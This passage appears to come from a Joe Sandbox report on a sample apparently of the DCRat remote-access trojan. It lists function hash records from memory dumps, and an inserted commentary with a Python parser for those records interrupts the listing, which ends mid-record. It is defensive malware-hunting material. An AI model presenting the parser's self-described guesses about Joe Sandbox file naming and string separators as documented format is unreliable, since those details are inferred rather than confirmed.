                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction ID: e9ded1e7a39c2288d19f58994c3d64cc1434d502ad49feb5176d5f7f83747c58
                  • Opcode Fuzzy Hash: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction Fuzzy Hash: 15F0963490E38D8FD76A9F7088251A93F60BF56201F4604FAE449C61F2DB78D558C701
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction ID: 45db22eca49bf6d55f29746af9659d65589cf408075368fb500bfbacb40a3961
                  • Opcode Fuzzy Hash: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction Fuzzy Hash: DEF0E93090E78D8FE75A5FB088245B937A0BF46305F4604BFF859C60E2DB789658C701
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction ID: 623a4923ecb62766fbe44c18dff96c20ed2e42141390b8d42f583171f90aabdb
                  • Opcode Fuzzy Hash: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction Fuzzy Hash: E8F09770D1951E8FEBA8EB99D4A4BFCB7B1EB54305F1140BED41DA2291CE781A80DF10
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction ID: 012d7b0f8ad93769316be76febafb4fc864fc364257ae5f617669532e982edff
                  • Opcode Fuzzy Hash: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction Fuzzy Hash: 7BC0023591455E9BDF50EF94D8555EE73A5FF54201F000526A82DD3151DB70A6208B40
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#$&$)$+$[$}
                  • API String ID: 0-4069700903
                  • Opcode ID: 673095d4b8ac266de434db5b54cf4a5db604de6f4607a02007f917ef9a5b853f
                  • Instruction ID: 04643fdb568ea9f5a3af98fbc9a00099da532c279d41d27eefdaa4cbcad23371
                  • Opcode Fuzzy Hash: 673095d4b8ac266de434db5b54cf4a5db604de6f4607a02007f917ef9a5b853f
                  • Instruction Fuzzy Hash: E6A1E670E0926D8EEBA8DF54C8A47FDB7B1AF54300F5140BAD04D97291DBB86A84DF01
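The records above (one per function the Joe Sandbox IDA plugin recovered from a memory dump) are what a practitioner pivots on when hunting for related DCRat builds: the Opcode ID and Instruction ID are stable across samples even when the dropped binary is re-obfuscated. The following Python is an added example, not code from the report or from Joe Sandbox, that parses these "Memory Dump Source" blocks from a report saved as text. The sample input is three records copied verbatim from the listing above. The interpretation of the `.sdmp` file name (process number, stage, serial, base address) and of `$` as the separator inside "String ID" are inferences from the listing, not documented format, and the Jaccard overlap is my own metric, not the report's "Similarity" score.

```python
"""Extract Joe Sandbox 'Memory Dump Source' function records from a report saved as text."""
import re
from collections import defaultdict

# Constructed sample: three records copied from the listing above (two from process 23,
# dump 0x7FFD9BA11000; one from process 26, dump 0x7FFD9BA10000). Nothing is invented.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
• Instruction ID: 012d7b0f8ad93769316be76febafb4fc864fc364257ae5f617669532e982edff
• Opcode Fuzzy Hash: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
• Instruction Fuzzy Hash: 7BC0023591455E9BDF50EF94D8555EE73A5FF54201F000526A82DD3151DB70A6208B40
Strings
Memory Dump Source
• Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
Similarity
• API ID:
• String ID: "$#$&$)$+$[$}
• API String ID: 0-4069700903
• Opcode ID: 673095d4b8ac266de434db5b54cf4a5db604de6f4607a02007f917ef9a5b853f
• Instruction ID: 04643fdb568ea9f5a3af98fbc9a00099da532c279d41d27eefdaa4cbcad23371
• Opcode Fuzzy Hash: 673095d4b8ac266de434db5b54cf4a5db604de6f4607a02007f917ef9a5b853f
• Instruction Fuzzy Hash: E6A1E670E0926D8EEBA8DF54C8A47FDB7B1AF54300F5140BAD04D97291DBB86A84DF01
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
Similarity
• API ID:
• String ID: L_H
• API String ID: 0-402390507
• Opcode ID: 8c93f6dd707de518f30e61b2e19ed872c90ab1bcb87ad106eff65078deec99bc
• Instruction ID: e5152454bea255b5d5d3311cb20cfddabaa85ffa9f4018c89bee9c8add3487ef
• Opcode Fuzzy Hash: 8c93f6dd707de518f30e61b2e19ed872c90ab1bcb87ad106eff65078deec99bc
• Instruction Fuzzy Hash: CB91B171A1994E8FEB94DB6CC8657AC7BE1EFA9310F5001BAD05DD72DACBB42805CB40
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# Inferred from the listing (not documented format): <proc>.<stage>.<serial>.<base>.<4 words>.sdmp
SOURCE_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.(?:[0-9A-F]{8}\.){4}sdmp, "
    r"Offset: ([0-9A-F]{16}), based on PE: (true|false)$", re.I)
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_", re.I)


def parse_records(text):
    """One dict per 'Memory Dump Source' block; blocks cut off before Opcode ID are dropped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur[m.group(1).strip()] = m.group(2).strip()  # labels like 'Strings' are skipped
    return [r for r in records if r.get("Opcode ID")]


def describe_source(source_file):
    """Decode the .sdmp name; 'proc' is Joe Sandbox's process number (0x17 = 23 here)."""
    m = SOURCE_RE.match(source_file)
    if not m:
        raise ValueError(f"unexpected Source File format: {source_file!r}")
    proc, stage, serial, base, offset, on_pe = m.groups()
    return {"proc": int(proc, 16), "stage": int(stage, 16), "serial": int(serial),
            "base": int(base, 16), "offset": int(offset, 16), "based_on_pe": on_pe == "true"}


def snapshot_matches_source(record):
    """Sanity check: hcaresult_<proc>_<stage>_<base> must agree with the Source File fields."""
    src = describe_source(record["Source File"])
    m = SNAPSHOT_RE.match(record.get("Snapshot File", ""))
    return bool(m) and (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == (
        src["proc"], src["stage"], src["base"])


def split_strings(string_id):
    """Referenced strings appear '$'-joined (inferred; a literal '$' in a string is ambiguous)."""
    return string_id.split("$") if string_id else []


def summarize(records):
    """Per (process, dump offset): function count and how many carry string references."""
    by_dump = defaultdict(lambda: {"functions": 0, "with_strings": 0})
    for r in records:
        src = describe_source(r["Source File"])
        d = by_dump[(src["proc"], f"{src['offset']:016X}")]
        d["functions"] += 1
        d["with_strings"] += bool(r.get("String ID"))
    return dict(by_dump)


def opcode_overlap(records_a, records_b):
    """Jaccard overlap of two reports' Opcode ID sets (my metric, not the report's Similarity)."""
    a = {r["Opcode ID"] for r in records_a}
    b = {r["Opcode ID"] for r in records_b}
    return len(a & b) / len(a | b) if a | b else 0.0


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(summarize(recs), all(snapshot_matches_source(r) for r in recs))
```

Run it against a whole report dump and compare `opcode_overlap` between two DCRat submissions to see which unpacked-stage functions are shared; the `snapshot_matches_source` check catches records that were mis-joined when the page was saved as text.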
                  Strings
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_H
                  • API String ID: 0-402390507
                  • Opcode ID: 8c93f6dd707de518f30e61b2e19ed872c90ab1bcb87ad106eff65078deec99bc
                  • Instruction ID: e5152454bea255b5d5d3311cb20cfddabaa85ffa9f4018c89bee9c8add3487ef
                  • Opcode Fuzzy Hash: 8c93f6dd707de518f30e61b2e19ed872c90ab1bcb87ad106eff65078deec99bc
                  • Instruction Fuzzy Hash: CB91B171A1994E8FEB94DB6CC8657AC7BE1EFA9310F5001BAD05DD72DACBB42805CB40
                  Strings
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$O$Q${
                  • API String ID: 0-1370898747
                  • Opcode ID: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction ID: a9a965af2f8beb9567f01c68d71a068c816c860216b0431124e0f6b3adf763f4
                  • Opcode Fuzzy Hash: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction Fuzzy Hash: C421B770E0962D8FEBA4DF54C8547E9B6B2BB54301F0551F9D40DA62A1CBB96B84CF40
                  Strings
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: 1f7f209dc65dafb90b994379baa6a986a858f8a3067549f79b6b24bbb4023c36
                  • Instruction ID: 6299845d5c67e20c092f955893f3f75fdc271585c3856fd1aebf345e617ddc35
                  • Opcode Fuzzy Hash: 1f7f209dc65dafb90b994379baa6a986a858f8a3067549f79b6b24bbb4023c36
                  • Instruction Fuzzy Hash: 055105B1E0562D8BDBA8DF18C8957A9B7B1FF58301F1041EAE10DE32A1DA746E818F45
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd5f5a4b70b5aa24ff437fee1e7979db41269df16d2cea7de9dcc060d7fdaad8
                  • Instruction ID: 445d76a0bd3555df708787bbfb3791d93d4451200cdbd0bb5f7341b912a2f832
                  • Opcode Fuzzy Hash: dd5f5a4b70b5aa24ff437fee1e7979db41269df16d2cea7de9dcc060d7fdaad8
                  • Instruction Fuzzy Hash: 56E16C71E1965D8FEBA8DBA8C4A47B8B7A1FF58301F4540BED05ED72E2CA756940CB00
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction ID: 8c6e8134cd8cdedcdea09ca9bb411f62f6dc76414da184542e39f81906c9b7d2
                  • Opcode Fuzzy Hash: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction Fuzzy Hash: 8791EF31B1DA4D4BDB98DF5C88606B977E2EFA8300B1541BAE45EC32D2DE31AD02C781
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction ID: d72d3660e3d24b4d7d8167cbf63c9e8af5ab906b79f9a79a8d13044e19e9a6c5
                  • Opcode Fuzzy Hash: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction Fuzzy Hash: 6A616953B0FACA0FF77157AC68644B53B90EF9275070A92F7D0A8870FBEC55A9058385
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 632af5f3654e96f336b7569f11d57a1871cc0d953fe2582f3792098ac627b542
                  • Instruction ID: fb9f5c3b8d33f3bb1c041909fe2c45569c68ee46e46d9b0835c3fe5ba3c970ac
                  • Opcode Fuzzy Hash: 632af5f3654e96f336b7569f11d57a1871cc0d953fe2582f3792098ac627b542
                  • Instruction Fuzzy Hash: A6515C70E0961D9FEBA4EFA8C4646EDB7F1EF54301F115079D009E72A1CB786944CB50
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe62fcffbcb34f41c74288f9a5a8bedb721c833fba8928bd7673782ec91c6e6c
                  • Instruction ID: 9c48393c95632a2160cb29bfe87b68ec6ab94e7338ef24cbcc86b6dbfdbe7e7a
                  • Opcode Fuzzy Hash: fe62fcffbcb34f41c74288f9a5a8bedb721c833fba8928bd7673782ec91c6e6c
                  • Instruction Fuzzy Hash: E5514E70E0D61D8FEBA4EBA8C4A57EDB7F1EF59300F11507AD00DE7292DA78A9418B40
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8134d8d667bf9df33134c962dd89a6d05b6072c38d33606ecaa7ea67de042c7
                  • Instruction ID: a71915831c1793dc39347c13ffdcb8013afdb40e278fd45a02769215f80c31a1
                  • Opcode Fuzzy Hash: b8134d8d667bf9df33134c962dd89a6d05b6072c38d33606ecaa7ea67de042c7
                  • Instruction Fuzzy Hash: 78414762F0E54E5FE7A1EBA8C8A96F977E0FF15310F4644B7D068C70A6EE64A504C341
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc08400ab1d00a135ba7f066b703dcdf7f0932983870cf6da1beaabf7e4eb079
                  • Instruction ID: 029788ee156b93d5a26183c2dc304847311c04922bda31875f8c663223e25316
                  • Opcode Fuzzy Hash: cc08400ab1d00a135ba7f066b703dcdf7f0932983870cf6da1beaabf7e4eb079
                  • Instruction Fuzzy Hash: 97510870E0A61D8FDBA4DFA4D4A46ED77F1EF18300F51107AE019E72A2DB78AA44CB50
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b82d980743b6ea4aa0678639d6251c634f34516478f83e11a4b18584b5eb27f4
                  • Instruction ID: 91111be3a475bc710387c2d54a25c3c54e53a06bd7f65e5e8a36175121877f10
                  • Opcode Fuzzy Hash: b82d980743b6ea4aa0678639d6251c634f34516478f83e11a4b18584b5eb27f4
                  • Instruction Fuzzy Hash: D731E575E0D91D8EEBE4EBA894A57FCB7B1FF58300F512079D00DE7292DE6869428B40
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2b183d77d53dfd781c86b98606d698ad952cc044153d3d3185bd75d361e79cc
                  • Instruction ID: 71a7a8ba148273fbc3345f568fc873b5a79f54ef9f15e92b108d227d269c53cf
                  • Opcode Fuzzy Hash: a2b183d77d53dfd781c86b98606d698ad952cc044153d3d3185bd75d361e79cc
                  • Instruction Fuzzy Hash: D031B875E0D91D8EEBE4EB9894A57FCBBB1EF58300F512039D00DE7292DE6869418B40
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction ID: d0b9f3ba695510e065d626d8abd815a0f1c535578c84956f332d7e4d77dc4a87
                  • Opcode Fuzzy Hash: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction Fuzzy Hash: A4218B52B0F18B97E76137BC98B95E93B90FF11318B0A41B3E4A9CA0D3DD18A159C2C5
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f50093ead18b3bc726dec4582162429e3e5a9fe6b3a46216c4383c9595a65bb5
                  • Instruction ID: aafb1ad64ea34c269b1db4843f190eeaa01efa8e4d82419b5d895c92f468ab83
                  • Opcode Fuzzy Hash: f50093ead18b3bc726dec4582162429e3e5a9fe6b3a46216c4383c9595a65bb5
                  • Instruction Fuzzy Hash: 5721813090864D8FDB84EF68C855AA93BF0FF1C305F01056AE85DC7265DB70E540CB80
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d2cfce47ba2a9a94ef41c2411e72874014788e4ed103da80d1cac9bc4bb7fbe
                  • Instruction ID: 08887ec2eb7e8ed07841963b64c41666f91488efe8f9b7ed4a9ebe0bd979b971
                  • Opcode Fuzzy Hash: 4d2cfce47ba2a9a94ef41c2411e72874014788e4ed103da80d1cac9bc4bb7fbe
                  • Instruction Fuzzy Hash: 7D11C130E0E50E4FEBA0EBA8C8695FE7BE1FF58710F4655B6D459C30A6EE74A6408740
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: add774f49dc9a3282d01d8e4b4da49c902589c7c7d993b174a5a248b5cffd1da
                  • Instruction ID: bd39f996886c48cd03d98bb591466960d116421a21cbd4d447ed2fe72f0177c9
                  • Opcode Fuzzy Hash: add774f49dc9a3282d01d8e4b4da49c902589c7c7d993b174a5a248b5cffd1da
                  • Instruction Fuzzy Hash: BB219D30E0E61E8EFBA0EBA4C4546FE76E1EF48300F565576D019931E5DFB8A6988B40
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c47dfd78cbb0d5c8ee4c3999269ff625efdc1f1a8779be2e917e8e7ec6aace49
                  • Instruction ID: d63621fe4d692a9390c126a03c7e64c69922653c8f94692c3a4668f026c7eb57
                  • Opcode Fuzzy Hash: c47dfd78cbb0d5c8ee4c3999269ff625efdc1f1a8779be2e917e8e7ec6aace49
                  • Instruction Fuzzy Hash: 30118630A0E64E4FDB96EB68C8A95B97BB0FF15300F0504BBD459CB0A2EE796A44C740
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8425b31041a682e6d95aeab6a3ae4a610a120c6b96bf1e460644be89e5b05052
                  • Instruction ID: 2ea060a08fd2ac001a2134d814eba49dae6af7f989dc3f601c8eb18ecc83aae8
                  • Opcode Fuzzy Hash: 8425b31041a682e6d95aeab6a3ae4a610a120c6b96bf1e460644be89e5b05052
                  • Instruction Fuzzy Hash: DA119130A0990E9EEBA8EF68C4696BE77E1FF18304F10057ED41EC21E5DE75AA44C740
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bcecc3565a5de7b1a392716dff33dc13cd50b00abfe78f8262932d00e9417bbb
                  • Instruction ID: 320afd7f5234b5826e1d7b306f81710bf01e63320e501e01f2df3f9fc045c36f
                  • Opcode Fuzzy Hash: bcecc3565a5de7b1a392716dff33dc13cd50b00abfe78f8262932d00e9417bbb
                  • Instruction Fuzzy Hash: 54110230A0E68E8FDB99EF64C4A51B93FA0FF59300F0120BED019CA0A2DA79A640C740
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction ID: dda8ce46e190816e5ebc5f5bbf14645127bb5504ddbcf576dc65b4bc88226100
                  • Opcode Fuzzy Hash: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction Fuzzy Hash: 5901D870E0A60E4FE791ABB4C4595A977E0FF15304F0656B6D418C20B5DE74E2548700
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4ab69c97932fc5139309058ca3333d113f69b21c5c571a86c9c3709ceec034f
                  • Instruction ID: 0a066387e63879e38da052339a1bab243184c2c80a110aabfc4da9d932445038
                  • Opcode Fuzzy Hash: c4ab69c97932fc5139309058ca3333d113f69b21c5c571a86c9c3709ceec034f
                  • Instruction Fuzzy Hash: 4111A330A0964D4FDB95EBA8C4A91B97BB0FF19300F0505BED459C71A2DB799644C740
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d7c2613ae5d87d008f1b4bfd3f97b044bd502218ba5dd295858338acff01b52e
                  • Instruction ID: bff7c74e2e1efa7e81f115253ce5f2947e8e78e50df93f0431b2936a419c86b3
                  • Opcode Fuzzy Hash: d7c2613ae5d87d008f1b4bfd3f97b044bd502218ba5dd295858338acff01b52e
                  • Instruction Fuzzy Hash: A3116D30A0964E8FDBA8EF68C4696FD7BE0FF18304F5105BED42AC65A1DB75A650C740
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7bf60c152b2ff9162c09a43bfe71da2e149cd25060054b4ee6639edd7eede3ef
                  • Instruction ID: 42a1fd6c0550283b7b756a77ffb3e9e15d57ef4fd89f1b7b57a9e4503b34f726
                  • Opcode Fuzzy Hash: 7bf60c152b2ff9162c09a43bfe71da2e149cd25060054b4ee6639edd7eede3ef
                  • Instruction Fuzzy Hash: 7C01D830A0F24D4FD7A2EBB8C4695A93BE0EF15300F4614F6D058C70B2DA74A5448701
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d16e69b504af59299e35ff973c02e3142915f7342ba62c69bd2088626239b7d
